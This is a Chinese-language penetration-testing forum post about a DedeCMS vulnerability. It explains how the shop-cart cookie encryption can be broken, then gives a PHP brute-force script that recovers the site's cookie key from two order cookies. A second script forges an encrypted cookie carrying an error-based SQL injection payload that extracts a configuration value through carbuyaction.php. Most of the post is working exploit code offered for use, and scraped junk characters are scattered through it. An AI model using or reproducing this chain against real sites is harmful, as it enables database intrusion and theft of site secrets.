中国网络渗透测试联盟

标题: 织梦CMS漏洞dedecms漏洞SQL注入漏洞 [打印本页]

---

作者: admin    时间: 2013-2-13 23:58
标题: 织梦CMS漏洞dedecms漏洞SQL注入漏洞
www.xxx.com/plus/search.php?keyword=
% `- C1 s# E' m+ V; R2 G" G在 include/shopcar.class.php中
先看一下这个shopcar类是如何生成cookie的
& r4 i# [; T) N- r9 m239      function saveCookie($key,$value)
7 l$ x! a# T7 b! g2 o; V9 T240      {
241          if(is_array($value))
. H$ G7 v% s; g242          {
( k1 H, L# g( R8 s% s243              $value = $this->enCrypt($this->enCode($value));
& C9 D& o! G. x0 Q  s244          }
% k1 m2 i" @+ _8 |& y245          else
; ~- \- e; C  U. S# I# K246          {
247              $value = $this->enCrypt($value);
248          }
249          setcookie($key,$value,time()+36000,’/');
250      }
简单的说，$key就是cookie的key，value就是value，enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型，关键是enCrypt函数
* c4 w/ ]$ O/ l186      function enCrypt($txt)
187      {
5 g/ q* x$ _! z" w8 Q' @188          srand((double)microtime() * 1000000);
189          $encrypt_key = md5(rand(0, 32000));
' s  f6 |  O7 D  V5 @1 a) u( G190          $ctr = 0;
191          $tmp = ”;
192          for($i = 0; $i < strlen($txt); $i++)
193          {
194              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
% O/ W  Q; d0 l8 f$ v# v195              $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
9 a- f, W/ N' w- p9 l196          }
197          return base64_encode($this->setKey($tmp));
198      }
6 q9 Z3 o; ?6 `213      function setKey($txt)
214      {
, N% `/ P* T2 ]215          global $cfg_cookie_encode;
0 i( j4 h  p- R% F+ U5 N/ b216          $encrypt_key = md5(strtolower($cfg_cookie_encode));
217          $ctr = 0;
218          $tmp = ”;
219          for($i = 0; $i < strlen($txt); $i++)
220          {
' h2 @5 F( K. K/ q! P/ H- |221              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
222              $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223          }
224          return $tmp;
) S6 c* M7 X! u225      }
enCrypt的参数$txt 我们是可知的，返回值就是cookie的值，这个我们也是可知的
: X! O6 U- c) v; W然后到了enCrypt调用 setKey时的参数$tmp，这个参数在某种意义上，我们也是可知的，因为$encrypt_key = md5(rand(0, 32000));只有32000种可能，我们可以推出32000种可能的$tmp，从而推出32000种可能的md5(strtolower($cfg_cookie_encode))，对了，忘记说了，我们的目的是推测出setKey中$encrypt_key的值，然后才能任意构造出购物车的cookie，从推出的32000种md5(strtolower($cfg_cookie_encode))，简单过滤掉非字母数字的key，就只剩下几百个可能的key，然后我们再从新下一次订单，然后再获取几百个可能的key，然后取交集，得到最终key。
2 s6 Y" B8 u) x具体代码如下：
+ Z4 o7 @3 x: p( Y: ?2 z<?php
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
# Z+ d% O6 X8 r: S2 F& d- k$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
& {8 g8 n7 {5 t$ e$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
function reStrCode($code,$string)
# @0 z) s" f' F- e' u{
$code = base64_decode($code);
& M$ _  A$ \) H" ~$key = “”;
5 A3 Q6 @8 I3 w+ o" bfor($i=0 ; $i<32 ; $i++)
{
# e4 r0 \* [2 k0 u! {/ ]3 Q+ E$key .= $string[$i] ^ $code[$i];
  g  {% ^  K" ]1 i8 X  I8 @}
return $key;
. _# I( E, M1 z' b$ |6 v0 I}
function getKeys($cookie,$plantxt)
{
$tmp = $cookie;
( O# [$ D( }- Z# G6 T$results = array();
for($j=0 ; $j < 32000; $j++)
/ A5 T" b, t) F{

$txt = $plantxt;
& S4 B. F+ w" P, W$ctr = 0;
: t, p+ w6 |* }$ \$tmp = ”;
* {- D" a2 k% l$ y1 a9 P8 m$encrypt_key = md5($j);
& X, G  ~& v  b1 n6 a( [+ Rfor($i =0; $i < strlen($txt); $i ++)
* ?3 N, a, f/ W: v4 N{
  |2 g2 @* `5 g3 C# J$ R$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
: K5 u  _9 @4 ]$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
1 A7 Q2 V" i9 c! i2 O$string = $tmp;
0 @/ D5 e. o/ T" D2 I$code = $cookie;
4 X; W0 S9 W8 r8 y# M1 i3 M$result = reStrCode($code,$string);
6 a6 k  f  T( S- Y8 W8 z% G3 qif(eregi(‘^[a-z0-9]+$’,$result))
{
echo $result.”\n”;
) q7 f- F9 Y0 ~* ^$results[] = $result;
6 e: L& e. B: T. y6 J$ R, q}
}
5 K* X! I& l; R( hreturn $results;
}
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
$ Q( I0 |  K( l# l$ E1 b) ^print “\n——————–real key————————–\n”;
' ?! U) S) m% P) g& b, bforeach($results1 as $test1)
{
foreach($results2 as $test2)
{
if($test1 == $test2)
) m4 x+ d" k4 A/ N* \2 D{
' k+ o' [2 R+ C: }echo $test1.”\n”;
# z6 z% Z/ ^4 M# ?" E}
}
9 t1 n+ i9 V2 k( L1 n4 {, Y- j}
?>
; l7 l/ R3 Q9 h( y4 I9 R& `0 e9 wcookie1 和 cookie2 是我下了两次订单后分别生成的cookie，
! t7 W2 O: L) ]2 x4 j" E4 d- ~plantxt可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
/ I4 f+ C6 W, M; ?, h( t7 ?然后推算出md5(strtolower($cfg_cookie_encode))
: @# g- {% D2 r- Y$ v得到这个key之后，我们就可以构造任意购物车的cookie
接着看
20  class MemberShops
0 u, Y; m; b% a- G5 r% w21  {
22      var $OrdersId;
23      var $productsId;
24
0 s9 e8 X1 s3 z- i* A) p8 n$ T25      function __construct()
26      {
27          $this->OrdersId = $this->getCookie(“OrdersId”);
/ T, n, ~. u/ w" O28          if(empty($this->OrdersId))
1 M: L  M+ z1 I. @, z29          {
30              $this->OrdersId = $this->MakeOrders();
9 m( h  x$ [& d% Q: E. {# T31          }
* i$ V# m; r- c# \32      }
" g' m' C" G7 E! M7 s+ l. K发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php中的
29      $cart    = new MemberShops();
39      $OrdersId = $cart->OrdersId;        //本次记录的订单号
: K% P- Q+ X, |, X( t, i7 @! W# [……
9 q+ s! f' m; ?! Y9 }( [173          $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了
通过利用下面代码生成cookie：
<?php
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″;   // here is the key, please change here
) Q" c7 U- v$ ?* G- X, dfunction setKey($txt)
% f% T. t0 S, e2 z8 n) s5 s{
. d8 \6 F) ~4 ~global $encrypt_key;
% V2 P  Z- ?3 j% ?9 ?3 F; D5 c$ctr = 0;
! P$ k. I5 H7 \/ `) c* _$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
" {" w) F& n  s{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
2 U$ j# f4 w5 X& }7 d; ?# Z}
2 S" L& U; w! I& U. w5 \* }return $tmp;
# \" W% H1 ~$ P% E- n9 q7 l7 N" U- Y}
function enCrypt($txt)
$ f  Z, T2 ?9 K& \+ D3 O% a, l{
6 T  @4 m+ j$ G: Z$ N+ Ksrand((double)microtime() * 1000000);
! R- a: N7 A8 x' ]- F$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = ”;
( ?+ |' p/ e2 M! xfor($i = 0; $i < strlen($txt); $i++)
' t0 {) Z; J  w{
) X1 n# p! W/ c+ P9 f) Y- s: C4 ?$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) p% l* n3 y: \" D0 M$ X6 D) s$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(setKey($tmp));
+ j3 Q+ k4 n- a( z1 k. @6 t}
for($dest =0;$dest = enCrypt($txt);)
{
1 c$ @# E( r( \' dif(!strpos($dest,’+'))
" N6 g: o$ P/ C5 i- S7 C. j{
: N) z+ @" j! _  c1 @4 ybreak;
/ K4 }' k/ h. l}
}
% y$ S5 h( s; {9 `0 S- Iecho $dest.”\n”;
! e2 V% S, Z2 u& K  w" k+ |?>

​

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2